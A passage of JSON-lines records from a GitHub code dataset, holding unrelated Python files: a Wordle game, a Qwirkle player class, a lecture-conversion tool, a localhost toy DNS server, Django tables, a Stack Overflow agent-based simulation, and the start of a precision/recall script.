processes.map(image_downloader, images_list)\n\n processes.close()\n processes.join()\n\n # image_downloader(input_file, dst_dir)\n","repo_name":"mixer3d/mainprogram","sub_path":"mainprogram_multi.py","file_name":"mainprogram_multi.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22977699511","text":"import numpy as np\nfrom rl2048.utils import action_select, copy_data, variable\n\n\ndef test_action_select():\n\n x = variable((100, 4), type_='float')\n a = variable((100, ), type_='long')\n\n x_data = np.random.random(size=(100, 4))\n a_data = np.random.randint(0, 4, size=100)\n\n copy_data(a, a_data)\n copy_data(x, x_data)\n\n expected = x_data[range(100), a_data]\n computed = action_select(x, a).data.cpu().numpy()\n\n np.testing.assert_allclose(expected, computed)\n","repo_name":"vighneshbirodkar/rl2048","sub_path":"rl2048/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"70002502965","text":"# Name: Jeanie Ho\r\n# UTEID: jth3929\r\n#\r\n# On my honor, , this programming assignment is my own work\r\n# and I have not provided this code to any other student.\r\n\r\n# secret words are actual answers, other valid words will not be picked\r\n# method for when user enters guess, check if its in sercret or others, update data structure to hold letters player has guessed and unguessed\r\n# while guess has not beeen create\r\nimport random\r\nimport string\r\n\r\n\r\ndef main():\r\n \"\"\" Plays a text based version of Wordle.\r\n 1. Read in the words that can be choices for the secret word\r\n and all the valid words. The secret words are a subset of\r\n the valid words.\r\n 2. Explain the rules to the player.\r\n 3. Get the random seed from the player if they want one.\r\n 4. Play rounds until the player wants to quit.\r\n \"\"\"\r\n secret_words, all_words = get_words()\r\n welcome_and_instructions()\r\n final_word = random.choice(secret_words)\r\n play_again = play(final_word, all_words)\r\n while (play_again):\r\n final_word = random.choice(secret_words)\r\n play_again = play(final_word, all_words)\r\n\r\n\r\n# def play(final_word, all_words):\r\n# \"\"\" Play a single round of Wordle.\r\n# 1. Get the user's guess.\r\n# 2. Check if the guess is valid.\r\n# 3. Check if the guess is correct.\r\n# 4. If the guess is correct, print a message.\r\n# 5. Ask the user if they want to play again.\r\n# 'y,y,200,bEESt,bEAst,YEAST,bEETS,bEsET,y,gAUNT,gAMERs,gAMER,AUNTs,gauge,gregs,great,tears,no i dont want to'\r\n# \"\"\"\r\n# dict = {}\r\n# if (final_word[i] not in dict):\r\n# dict[final_word[i]] = 1\r\n# else:\r\n# dict[final_word[i]] += 1\r\n# alphabet = string.ascii_uppercase\r\n# found = False\r\n# prev_guesses = ''\r\n# tries = 0\r\n# while not found and tries < 6:\r\n# guess = input('\\nEnter your guess. A 5 letter word: ').strip().upper()\r\n# if (guess not in all_words):\r\n# print('\\n' + guess + ' is not a valid word. Please try again.')\r\n# continue\r\n# tries += 1\r\n# # make check a dictionary with the colors as keys and num times in final_word as values\r\n# check = ['-', '-', '-', '-', '-']\r\n# repeat = ''\r\n# repeat_o = ''\r\n# for i in range(len(guess)):\r\n# # remove guess[i] from alphabets\r\n# alphabet = alphabet.replace(guess[i], '')\r\n# # check if guess[i] is in alphabet to avoid duplicates\r\n# if (guess[i] == final_word[i]):\r\n# check[i] = 'G'\r\n# if (guess[i] in dict):\r\n# dict[guess[i]] -= 1\r\n# for j in range(i):\r\n# if (guess[j] == guess[i]):\r\n# check[j] = '-'\r\n# repeat = final_word[i]\r\n# elif (guess[i] in final_word and guess[i] != final_word[i] and guess[i] != repeat and guess[i] != repeat_o):\r\n# check[i] = 'O'\r\n# repeat_o = guess[i]\r\n# elif (guess[i] == repeat or guess[i] == repeat_o):\r\n# check[i] = '-'\r\n# if (guess == final_word):\r\n# check[i] = 'G'\r\n# prev_guesses += ('\\n' + ''.join(check) + '\\n' + guess)\r\n# print(prev_guesses)\r\n# print('\\n' + \"Unused letters: \" + ' '.join(alphabet))\r\n# if (guess == final_word):\r\n# found = True\r\n# print_message(tries, found, final_word)\r\n# play_again = input('\\nDo you want to play again? Type Y for yes: ').lower()\r\n# if (play_again == 'y'):\r\n# return True\r\n\r\n\r\ndef play(final_word, all_words):\r\n \"\"\" Play a single round of Wordle.\r\n 1. Get the user's guess.\r\n 2. Check if the guess is valid.\r\n 3. Check if the guess is correct.\r\n 4. If the guess is correct, print a message.\r\n 5. Ask the user if they want to play again.\r\n 'n,y,1313,oomph,orzos,mockoo,oTtoS,sHOOT,n'\r\n y,y,49,barbs,roara,roars,kites,kittens,knights,kribs,krocks,ricks,BRICk,nope\r\n \"\"\"\r\n orig_dict = {}\r\n for i in range(len(final_word)):\r\n if (final_word[i] not in orig_dict):\r\n orig_dict[final_word[i]] = 1\r\n else:\r\n orig_dict[final_word[i]] += 1\r\n alphabet = string.ascii_uppercase\r\n found = False\r\n prev_guesses = ''\r\n tries = 0\r\n while not found and tries < 6:\r\n dict = {}\r\n for i in range(len(final_word)):\r\n if (final_word[i] not in dict):\r\n dict[final_word[i]] = 1\r\n else:\r\n dict[final_word[i]] += 1\r\n guess = input('\\nEnter your guess. A 5 letter word: ').strip().upper()\r\n if (guess not in all_words):\r\n print('\\n' + guess + ' is not a valid word. Please try again.')\r\n continue\r\n tries += 1\r\n # make check a dictionary with the chars as keys and num times in final_word as values\r\n check = ['-', '-', '-', '-', '-']\r\n for i in range(len(guess)):\r\n # remove guess[i] from alphabets\r\n alphabet = alphabet.replace(guess[i], '')\r\n # check if guess[i] is in alphabet to avoid duplicates\r\n if (guess[i] == final_word[i]):\r\n check[i] = 'G'\r\n dict[guess[i]] -= 1\r\n for j in range(i):\r\n if (guess[j] == guess[i] and guess != final_word and dict[guess[i]] < 0):\r\n check[j] = '-'\r\n elif (guess[i] in final_word and guess[i] != final_word[i] and dict[guess[i]] > 0):\r\n check[i] = 'O'\r\n dict[guess[i]] -= 1\r\n prev_guesses += ('\\n' + ''.join(check) + '\\n' + guess)\r\n print(prev_guesses)\r\n print('\\n' + \"Unused letters: \" + ' '.join(alphabet))\r\n if (guess == final_word):\r\n found = True\r\n print_message(tries, found, final_word)\r\n play_again = input('\\nDo you want to play again? Type Y for yes: ').lower()\r\n if (play_again == 'y'):\r\n return True\r\n\r\n\r\ndef print_message(tries, found, final_word):\r\n \"\"\" Print a message to the player. \"\"\"\r\n if found:\r\n if tries == 1:\r\n print('\\nYou win. Genius!')\r\n elif tries == 2:\r\n print('\\nYou win. Magnificent!')\r\n elif tries == 3:\r\n print('\\nYou win. Impressive!')\r\n elif tries == 4:\r\n print('\\nYou win. Splendid!')\r\n elif tries == 5:\r\n print('\\nYou win. Great!')\r\n elif tries == 6:\r\n print('\\nYou win. Phew!')\r\n else:\r\n print('\\nNot quite. The secret word was ' + final_word + '.')\r\n\r\n\r\ndef welcome_and_instructions():\r\n \"\"\"\r\n Print the instructions and set the initial seed for the random\r\n number generator based on user input.\r\n \"\"\"\r\n print('Welcome to Wordle.')\r\n instructions = input('\\nEnter y for instructions, anything else to skip: ')\r\n if instructions == 'y':\r\n print('\\nYou have 6 chances to guess the secret 5 letter word.')\r\n print('Enter a valid 5 letter word.')\r\n print('Feedback is given for each letter.')\r\n print('G indicates the letter is in the word and in the correct spot.')\r\n print('O indicates the letter is in the word but not that spot.')\r\n print('- indicates the letter is not in the word.')\r\n set_seed = input(\r\n '\\nEnter y to set the random seed, anything else to skip: ')\r\n if set_seed == 'y':\r\n random.seed(int(input('\\nEnter number for initial seed: ')))\r\n\r\n\r\ndef get_words():\r\n \"\"\" Read the words from the dictionary files.\r\n We assume the two required files are in the current working directory.\r\n The file with the words that may be picked as the secret words is\r\n assumed to be names secret_words.txt. The file with the rest of the\r\n words that are valid user input but will not be picked as the secret\r\n word are assumed to be in a file named other_valid_words.txt.\r\n Returns a sorted tuple with the words that can be\r\n chosen as the secret word and a set with ALL the words,\r\n including both the ones that can be chosen as the secret word\r\n combined with other words that are valid user guesses.\r\n \"\"\"\r\n temp_secret_words = []\r\n with open('secret_words.txt', 'r') as data_file:\r\n all_lines = data_file.readlines()\r\n for line in all_lines:\r\n temp_secret_words.append(line.strip().upper())\r\n temp_secret_words.sort()\r\n secret_words = tuple(temp_secret_words)\r\n all_words = set(secret_words)\r\n with open('other_valid_words.txt', 'r') as data_file:\r\n all_lines = data_file.readlines()\r\n for line in all_lines:\r\n all_words.add(line.strip().upper())\r\n return secret_words, all_words\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"jeanieho/Python","sub_path":"wordle_text.py","file_name":"wordle_text.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30198105975","text":"from random import Random\nfrom termcolor import colored\nfrom tablero.exceptions import InvalidPlayException\n\n\nclass Jugador:\n # Constructor de objetos\n def __init__(self, nombre ='Unknown Player'):\n self.fichas = []\n self.puntuacion = 0\n self.nombre = nombre\n\n # Le asigna seis fichas iniciales de la bolsa de fichas al jugador\n def asignarFichas (self, bolsaFichas):\n rnd = Random()\n while len(self.fichas) < 6 and len(bolsaFichas) > 0:\n posRandom = rnd.randint(0, len(bolsaFichas) - 1) # elige aleatoriamente una posición del arreglo de fichas \n self.fichas.append(bolsaFichas.pop(posRandom)) # y la agrega a la mano del jugador\n\n # Permite que el jugador humano juegue su turno en el juego\n def jugarTurno(self, tablero):\n fichasJugador = self.fichas.copy()\n while True:\n print(self.mostrarFichasMano(fichasJugador))\n print (' Comandos:')\n print (' (r) reinicia la jugada')\n print (' (#Ficha) (ColumnaFila) por ejemplo: 1 A5')\n print (' (t) termina el turno')\n\n opcion = input (' -> ')\n print('\\n\\n\\n')\n\n if len(opcion) == 0: # si no selecciono nada se muestra la misma pantalla de nuevo\n continue \n\n if opcion == 'r': # se deshace cualquier jugada hecha y se muestran las fichas y tablero iniciales\n tablero.reiniciarTurno()\n fichasJugador = self.fichas.copy()\n tablero.imprimirTablero()\n continue\n\n if opcion == 't': # se termina el turno del jugador actual\n break\n \n try: # si el primer dato no es el identificador de una ficha se muestra el error\n intFicha = int (opcion[0])\n except ValueError:\n print (colored('El valor de la ficha elegida debe ser un valor númerico', 'red', attrs=['bold']), '\\n')\n continue\n\n if indiceFicha >= len(fichasJugador): # la ficha elegida es mayor a la cantidad de fichas en la mano\n continue\n\n x, y = tablero.convertirCoordenada(opcion[2:].upper()) # convertimos el valor dado en un par ordenado\n try:\n tablero.jugar(fichasJugador[indiceFicha], x, y) # use esta ficha es esta coordenada\n fichasJugador.pop(indiceFicha)\n except InvalidPlayException: # si la jugada no es válida mostramos el error\n print (colored('La jugada elegida no es válida', 'red', attrs=['bold']), '\\n')\n\n tablero.imprimirTablero()\n\n self.fichas = fichasJugador.copy()\n\n # Muestra las fichas que tiene un jugador en su mano\n @staticmethod\n def mostrarFichasMano(fichasMano):\n fichasEnMano = ''\n mensaje = ''\n for ficha in fichasMano:\n fichasEnMano += colored(ficha.figura, ficha.color) + ' '\n mensaje += '\\n Fichas del jugador: %s' % fichasEnMano\n mensaje += '\\n 1 2 3 4 5 6\\n'\n\n return mensaje\n\n def sumarPuntos(self, pPuntos):\n self.puntuacion += pPuntos\n\n def sinFichas(self):\n return len(self.fichas) == 0\n\n def vaciarFichas(self):\n self.fichas = []\n\n def getFichas(self):\n return self.fichas\n\n def getPuntuacion(self):\n return self.puntuacion\n\n def getNombre(self):\n return self.nombre\n\n","repo_name":"Heyler-Johel/Qwirkle_Solver-","sub_path":"jugador.py","file_name":"jugador.py","file_ext":"py","file_size_in_byte":3807,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14279501189","text":"# vim: set expandtab sts=4 ts=4 sw=4:\n# This is free software, licensed under the LGPL v3. See the file \"COPYING\" for\n# details.\n#\n# (c) 2016-2017 Sebastian Humenda \n\"\"\"For documentation about this module, please refer to its classs master.\"\"\"\n\nimport os\nfrom . import config\nfrom .config import MetaInfo\nfrom . import common\nfrom . import errors\nfrom . import filesystem\nfrom . import pandoc\nfrom . import toc\n\n\nclass Master:\n \"\"\"m =Master(path)\nm.run()\n\nTake a directory and perform breath-first search to find the first\n.lecture_meta_data.dcxml. In this depth, all directories are scanned for this\nfile so that we actually have multiple roots (a forest). This is necessary for\nlectures containing e.g. lecture and exercise material. For each root the\nnavigation bar and the table of contents is generated; afterwards all MarkDown\nfiles are converted.\"\"\"\n\n def __init__(self, path, profile, output_format):\n if os.path.exists(path):\n if os.path.isfile(path):\n raise OSError(\"Operation can only be applied to directories.\")\n if common.is_valid_file(os.path.abspath(path)):\n raise errors.StructuralError(\n (\n \"The master command can only be called \"\n \"on a whole lecture, not on particular chapters.\"\n ),\n path,\n )\n self._roots = self.__findroot(path)\n self._profile = profile\n self._output_format = output_format\n\n def get_roots(self):\n return self._roots\n\n def __findroot(self, path):\n roots = []\n dirs = [path]\n go_deeper = True\n for directory in dirs:\n meta = [e for e in os.listdir(directory) if e == config.CONF_FILE_NAME]\n if meta: # found, this is our root\n roots.append(directory)\n go_deeper = False\n else:\n if go_deeper:\n dirs += [\n os.path.join(directory, e)\n for e in os.listdir(directory)\n if os.path.isdir(os.path.join(directory, e))\n ]\n found_md = any(\n fname.endswith(\".md\")\n for directory, _, flist in os.walk(path)\n for fname in flist\n )\n if not roots and found_md:\n # no root and markdown files present → lecture without configuration\n raise errors.ConfigurationError(\n (\"no configuration found, but it \" \"is required\"), path\n )\n return roots\n\n def get_translation(self, word, path):\n \"\"\"\"Return a translation for a word for a given path.\n Different paths might have different language configurations. This\n method loads the individual configuraiton.\"\"\"\n conf = config.ConfFactory().get_conf_instance(path)\n trans = config.Translate()\n trans.set_language(conf[MetaInfo.Language])\n return trans.get_translation(word)\n\n def run(self):\n \"\"\"This function should only be run from the lecture root. For other\n directories (subdirectories or unrelated directories) hopefully lead to\n a meaningful error message, but this is *not* guaranteed.\n\n This function creates a navigation bar, the table of contents and\n converts all files. It will raise ConfigurationError when no\n configuration has been found and there are MarkDown files.\"\"\"\n try:\n self._run()\n except errors.ConfigurationError as e:\n if not e.path:\n e.path = self._roots[0]\n raise\n\n def _run(self):\n orig_cwd = os.getcwd()\n for root in self.get_roots():\n os.chdir(root)\n if self._output_format == pandoc.formats.OutputFormat.Html:\n conf = config.ConfFactory().get_conf_instance(\".\")\n if conf[MetaInfo.GenerateToc]:\n # create table of contents\n c = toc.HeadingIndexer(\".\")\n c.walk()\n if not c.is_empty():\n index = c.get_index()\n md_creator = toc.TocFormatter(index, \".\")\n with open(\"inhalt.md\", \"w\", encoding=\"utf-8\") as file:\n file.write(md_creator.format())\n\n conv = pandoc.converter.Pandoc(root_path=orig_cwd)\n files_to_convert = [\n os.path.join(dir, f)\n for dir, _, flist in filesystem.get_markdown_files(\".\", True)\n for f in flist\n ]\n conv.set_conversion_profile(self._profile)\n conv.set_output_format(self._output_format)\n conv.convert_files(files_to_convert)\n os.chdir(orig_cwd)\n","repo_name":"TUD-INF-IAI-MCI/AGSBS-infrastructure","sub_path":"MAGSBS/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":4840,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"76"} +{"seq_id":"26259994475","text":"import socket, glob, json\n\nHOST = \"127.0.0.1\"\nPORT = 53\ndomains_json = {}\n\n# RESPONSE PARAMETERS\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind((HOST, PORT))\n\n\ndef load_zones():\n global domains_json\n zone_files = glob.glob(\"domains/*.domain\")\n for zone in zone_files:\n with open(zone) as zone_data:\n data = json.load(zone_data)\n domains_json[data[\"$origin\"]] = data\n return domains_json\n\n\ndef get_domain(data):\n expected_len = data[0]\n domain = \"\"\n current = 0\n question_type = \"\"\n for i, byte in enumerate(data):\n if byte == 0:\n question_type = data[i + 1: i + 3]\n break\n if i != 0:\n if current < expected_len:\n domain += chr(byte)\n current += 1\n else:\n domain += '.'\n expected_len = byte\n current = 0\n\n return domain, question_type\n\n\ndef get_records(domain, question_type):\n global domains_json\n try:\n domain_data = domains_json[domain]\n except KeyError as e:\n print(\"No such domain\")\n return None\n return domain_data[question_type]\n\n\ndef rec_to_bytes(recttl, recval):\n record = b\"\\xc0\\x0c\"\n record += bytes([0]) + bytes([1])\n record += bytes([0]) + bytes([1])\n record += int(recttl).to_bytes(4, byteorder='big')\n record += bytes([0]) + bytes([4])\n for part in recval.split('.'):\n record += bytes([int(part)])\n return record\n\n\ndef build_response(data):\n ID = \"\"\n QR = '1'\n OPCODE = \"\"\n AA = '1'\n TC = '0'\n RD = '0'\n RA = '0'\n Z = \"000\"\n RCODE = \"0000\"\n QDCOUNT = b\"\\x00\\x01\"\n\n for i, byte in enumerate(data):\n if i in [0, 1]:\n ID += hex(byte)[2:]\n if i == 2:\n for bit in range(1, 5):\n OPCODE += str(ord(bytes(byte)) & (1 << bit))\n\n ID = int(ID).to_bytes(1, byteorder='big')\n byte_1 = int(QR + OPCODE + AA + TC + RD, 2).to_bytes(1, byteorder='big')\n byte_2 = int(RA + Z + RCODE, 2).to_bytes(1, byteorder='big')\n domain, question_type = get_domain(req[12:])\n records = get_records(domain, \"a\")\n if records is None:\n return (0).to_bytes(2, byteorder='big')\n ANCOUNT = len(records).to_bytes(2, byteorder='big')\n\n NSCOUNT = (0).to_bytes(2, byteorder='big')\n ARCOUNT = (0).to_bytes(2, byteorder='big')\n\n dns_header = ID + byte_1 + byte_2 + QDCOUNT + ANCOUNT + NSCOUNT + ARCOUNT\n domain_array = domain.split('.')\n\n question = b\"\"\n for part in domain_array:\n question += bytes([len(part)])\n for char in part:\n question += ord(char).to_bytes(1, byteorder='big')\n question += (0).to_bytes(1, byteorder='big')\n question += (1).to_bytes(2, byteorder='big')\n question += (1).to_bytes(2, byteorder='big')\n\n dns_body = b\"\"\n dns_body += question\n for record in records:\n dns_body += rec_to_bytes(record[\"ttl\"], record[\"value\"])\n\n return dns_header + dns_body\n\n\nload_zones()\n\nwhile True:\n req, addr = sock.recvfrom(512)\n resp = build_response(req)\n print(resp)\n sock.sendto(resp, addr)\n","repo_name":"7aske/dns-server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3943299792","text":"import unittest\nfrom your_application_module import calculate_simple_interest\n\nclass TestSimpleInterestCalculator(unittest.TestCase):\n\n def test_interest_calculation(self):\n principal = 1000\n rate = 5\n time = 2\n interest = calculate_simple_interest(principal, rate, time)\n self.assertEqual(interest, 100.0)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"sammiekiogora/aretech-microfinance","sub_path":"unit test.py","file_name":"unit test.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8139785865","text":"import django_tables2 as tables\nimport django_filters as filters\nfrom django.forms import widgets\nfrom .models import Request\nfrom staff.models import Staff\n\n\nclass RequestTable(tables.Table):\n created_on = tables.DateColumn(format=\"d.m.Y\")\n assigned_to = tables.ManyToManyColumn(verbose_name=\"Исполнители\", linkify_item=True)\n applicant = tables.Column(verbose_name=\"Заявитель\", linkify=True, accessor=\"applicant\")\n apartment = tables.Column(verbose_name=\"Помещение\", linkify=True)\n actions = tables.TemplateColumn(verbose_name=\"Действия\", template_name=\"misc/linkbuttons.html\", extra_context={\n 'view_link': 'requests:view',\n 'edit_link': 'requests:edit',\n 'remove_link': 'requests:remove'\n }, orderable=False, exclude_from_export=True)\n\n class Meta:\n model = Request\n fields = ['created_on', 'applicant', 'request_type', 'assigned_to', 'priority', 'is_proceed', 'closed_on',\n 'apartment']\n template_name = 'django_tables2/bootstrap4.html'\n attrs = {'class': 'table table-striped table-bordered text-center'}\n empty_text = \"Ничего не найдено\"\n\n\nclass RequestFilter(filters.FilterSet):\n created_on = filters.DateFromToRangeFilter(\n widget=filters.widgets.RangeWidget(attrs={'class': 'form-control date-range date'}))\n assigned_to = filters.ModelMultipleChoiceFilter(widget=widgets.SelectMultiple(attrs={'class': 'select2'}),\n queryset=Staff.objects.all())\n\n def __init__(self, *args, **kwargs):\n super(RequestFilter, self).__init__(*args, **kwargs)\n self.filters['created_on'].label = 'Дата (диапазон)'\n self.filters['assigned_to'].label = 'Исполнители'\n\n class Meta:\n model = Request\n fields = ['created_on', 'request_type', 'assigned_to', 'priority', 'is_proceed']\n","repo_name":"noferai/comhome","sub_path":"requests/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"32994466027","text":"\"\"\"Module containing the entities of the model (user, question and answer).\"\"\"\n\n# Imports\nimport numpy as np\n\n\nclass user:\n \"\"\"\n A Stack overflow user.\n\n Attributes\n ----------\n system : .system\n framework of the model\n id : int\n user id\n tag : int\n tag of user\n reputation : int\n reputation of the user\n p_ask : float\n probability to ask a question\n p_answer : float\n probability to answer a question\n p_interact : float\n probability to upvote a question/answer\n p_active : float\n probability of being active on the site\n vis_questions : list\n all the questions that can be seen by this user\n my_questions : list\n all the questions asked by this user\n upvote_bias : int\n number of upvotes the user is satisfied with\n n_questions_asked : int\n number of questions asked by the user\n n_questions_answered : int\n number of questions answered by the user\n n_questions_upvoted : int\n number of questions upvoted by the user\n n_answers_upvoted : int\n number of answers upvoted by the user\n p_ask_begin : float\n begin probability of asking\n p_answer_begin : float\n begin probability of answering\n p_interact_begin : float\n begin probability of upvoting\n p_active_begin : float\n begin probability of being active\n\n Methods\n -------\n ask_question()\n Generate a question.\n answer_question(q)\n Generate an answer.\n upvote(interaction, upvote)\n Check if question/answer is upvoted by the user.\n update_p(p, n_upvotes, bias)\n Update probability based on the number of upvotes received.\n eval()\n Evaluate a user's questions and corresponding answers.\n step()\n Timestep of a single user.\n \"\"\"\n\n def __init__(self, system, i, tag):\n \"\"\"\n Initialize a Stack overflow user.\n\n Parameters\n ----------\n system : .system\n model that represents the Stack oveflow framework\n i : int\n id of the user\n tag : int\n community that the user is part of\n \"\"\"\n # Model\n self.system = system\n\n # ID\n self.id = i\n self.tag = tag\n\n # Starting reputation\n self.reputation = 1\n\n # Probabilities to ask, answer, upvote, be active\n self.p_ask = 0\n self.p_answer = 0\n self.p_interact = 0\n self.p_active = 0\n\n # Visible questions/answeres (from people with the same tag)\n self.vis_questions = []\n self.my_questions = []\n\n # Number of upvotes the user is satisfied with\n self.upvote_bias = system.upvote_bias\n\n # Data storage\n self.n_questions_asked = 0\n self.n_questions_answered = 0\n\n self.n_questions_upvoted = 0\n self.n_answers_upvoted = 0\n\n self.p_ask_begin = 0\n self.p_answer_begin = 0\n self.p_interact_begin = 0\n self.p_active_begin = 0\n\n def ask_question(self):\n \"\"\"Generate a question.\"\"\"\n u = np.random.uniform()\n if u < self.p_ask:\n q = question(self.id, self.tag)\n self.my_questions.append(q)\n self.system.questions.append(q)\n\n # Make the question visible for all active people with the same tag\n for id in self.system.tags[self.tag]:\n if id != q.asker:\n u = np.random.uniform()\n if u < self.system.users[id].p_active:\n self.system.users[id].vis_questions.append(q)\n self.n_questions_asked += 1\n\n def answer_question(self, q):\n \"\"\"\n Generate an answer.\n\n Parameters\n ----------\n q : .question\n object of the class question\n\n Returns\n -------\n outcome : int\n 1 if question is answered\n 0 otherwise\n \"\"\"\n outcome = 0\n u = np.random.uniform()\n\n # Lower probability if the question is already answered\n x = np.log(self.p_answer/(1-self.p_answer))\n x -= len(q.answers)\n p_answer = 1 / (1 + np.exp(-x))\n\n if u < p_answer:\n a = answer(self.id, q.tag)\n q.answers.append(a)\n self.n_questions_answered += 1\n outcome = 1\n\n return outcome\n\n def upvote(self, interaction, upvotes):\n \"\"\"\n Check if question/answer is upvoted by the user.\n\n Parameters\n ----------\n interaction : .question or .answer\n object of the class question or answer\n upvotes : int\n number of upvotes given already this round\n\n Returns\n -------\n upvotes : int\n updated number of upvotes\n \"\"\"\n # Check if the reputation is high enough to upvote\n if self.reputation >= self.system.upvote_treshold:\n u = np.random.uniform()\n\n # Lower probability if the user has already upvoted question/answers\n x = np.log(self.p_interact/(1-self.p_interact))\n x -= upvotes\n p_upvote = 1 / (1 + np.exp(-x))\n\n # Upvote question/answer\n if u < p_upvote:\n interaction.upvotes.append(self.id)\n upvotes += 1\n if type(interaction) == question:\n self.n_questions_upvoted += 1\n id = interaction.asker\n else:\n self.n_answers_upvoted += 1\n id = interaction.responder\n\n # Increase the reputation\n self.system.users[id].reputation += 10\n\n return upvotes\n\n def update_p(self, p, n_upvotes, bias):\n \"\"\"\n Update probability based on the number of upvotes received.\n\n Parameters\n ----------\n p : float\n current probability\n n_upvotes : int\n number of upvotes\n bias : int\n min. number of upvotes a user is satisfied with\n\n Returns\n -------\n new_p : float\n new probability\n \"\"\"\n # Sensitivity coefficient\n coeff = 0.1\n\n diff = n_upvotes - bias\n # Limit the difference between -5 and 5\n diff = np.max((diff, -5))\n diff = np.min((diff, 5))\n\n # Inverse sigmoid function of the probability\n x = np.log(p/(1-p))\n x += (coeff * diff)\n\n # Calculate new probability using sigmoid function\n new_p = 1/(1+np.exp(-x))\n\n return new_p\n\n def eval(self):\n \"\"\"Evaluate a user's questions and corresponding answers.\"\"\"\n for q in self.my_questions[::-1]:\n q.age += 1\n\n # Give every user the chance to upvote all the answers\n if q.age == 2:\n # Update probability of asking and being active\n self.p_ask = self.update_p(self.p_ask, len(q.upvotes), self.upvote_bias)\n self.p_active = self.update_p(self.p_active, len(q.upvotes), self.upvote_bias)\n\n if q.answers:\n max = q.answers[0]\n for a in q.answers:\n if len(a.upvotes) > len(max.upvotes):\n max = a\n\n # Update probability of answering and being active\n user = self.system.users[a.responder]\n user.p_answer = self.update_p(user.p_answer, len(a.upvotes), user.upvote_bias)\n user.p_active = self.update_p(user.p_active, len(a.upvotes), user.upvote_bias)\n\n # Increase the reputation of the user that gave the answer with the most upvotes\n self.system.users[max.responder].reputation += 15\n\n else:\n # If there was no answer on the question, decrease reputation of asker (downvote)\n self.reputation -= 2\n self.reputation = np.max((self.reputation, 1))\n\n self.my_questions.remove(q)\n\n def step(self):\n \"\"\"Timestep of a single user.\"\"\"\n # Evaluate previous questions\n self.eval()\n\n # Determine if user will ask a question\n self.ask_question()\n\n # Sort the visible questions based on upvotes\n self.vis_questions.sort(key=lambda x: len(x.upvotes), reverse=True)\n q_upvoted = 0\n for q in self.vis_questions:\n a_upvoted = 0\n # Upvote question\n q_upvoted = self.upvote(q, q_upvoted)\n # Answer question\n answered = self.answer_question(q)\n if not answered:\n q.answers.sort(key=lambda x: len(x.upvotes), reverse=True)\n # Upvote answers\n for a in q.answers:\n a_upvoted = self.upvote(a, a_upvoted)\n # Remove questions from the visible list\n self.vis_questions = []\n\n\nclass question:\n \"\"\"\n Represents a question asked by a user.\n\n Attributes\n ----------\n asker : int\n id of the user that asked the question\n tag : int\n tag (topic) of the question\n age : int\n number of timesteps the question exists\n upvotes : list\n ids of the users that have upvoted the question\n answers : list\n all the answers that were given on this question\n \"\"\"\n\n def __init__(self, id, tag):\n \"\"\"\n Initialize a question.\n\n Parameters\n ----------\n id : int\n id of the user that asked the question\n tag : int\n tag (topic) of the question\n \"\"\"\n self.asker = id\n self.tag = tag\n self.age = 0\n\n self.upvotes = []\n self.answers = []\n\n\nclass answer:\n \"\"\"\n Represents an answer given by a user.\n\n Attributes\n ----------\n responder : int\n id of the user that gave the answer\n tag : int\n tag (topic) of the question/answer\n upvotes : list\n ids of the users that have upvoted the answer\n \"\"\"\n\n def __init__(self, id, tag):\n \"\"\"\n Initialize an answer.\n\n Parameters\n ----------\n id : int\n id of the user that answered the question\n tag : int\n tag (topic) of the question/answer\n \"\"\"\n self.responder = id\n self.tag = tag\n\n self.upvotes = []\n","repo_name":"AaronDC60/ABM_stackoverflow_network","sub_path":"code/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":10431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31149806533","text":"# AUTHOR: Andre Rosa\n# DATE: 09 FEB 2019\n# OBJECTIVE: A generic calculator for Precision and Recall\n# The program work with two csv files that contain a videoName as first column and \n# a list of booleans for the rest of columns. \n\n# to run the code: python CalcPR.py groundTruthFile.csv Estimate.csv [list of categories]\n# if no list of categories the code will consider all categories\n\nimport csv\nimport os # for the runtime exit\nimport sys # for arguments input\nfrom Categories import NewCat\n\n#-------------------------------------------------------------------\n# CLASS LINE HOLDS EACH VIDEO NAME AND RELATED CATEGORIES\n# this class represents each line from the csv file, the first field is the name of the video \n# while the categories is a list of booleans 0,1\n#-------------------------------------------------------------------\nclass Line:\n\n NR_CATEGORIES = 0 #static variable to hold the number of categories\n\n def __init__(self, name, categories):\n self.name = name\n self.categories = categories\n \n Line.NR_CATEGORIES = len(categories)\n \n def isCategory (self, catIndex): # Return true if video belongs to category\n ''' Return the boolean value for the category '''\n\n return bool(self.categories[catIndex])\n\n def getVidName (self):\n return self.name\n\n def getCategories (self):\n return self.categories\n\n def getNumberofCategories (self):\n ''' Return the number of categories in a line '''\n return len(self.categories)\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# USED TO SHOW COLOR IN TERMINAL\n#-------------------------------------------------------------------\nclass sysColor:\n Red = '\\033[91m'\n Green = '\\033[92m'\n Blue = '\\033[94m'\n Cyan = '\\033[96m'\n White = '\\033[97m'\n Yellow = '\\033[93m'\n Magenta = '\\033[95m'\n Default = '\\033[99m'\n#-------------------------------------------------------------------\n\n#-------------------------------------------------------------------\n# READ A CSV FILE AND SAVES IN A LIST DATA STRUCTURE\n#-------------------------------------------------------------------\ndef 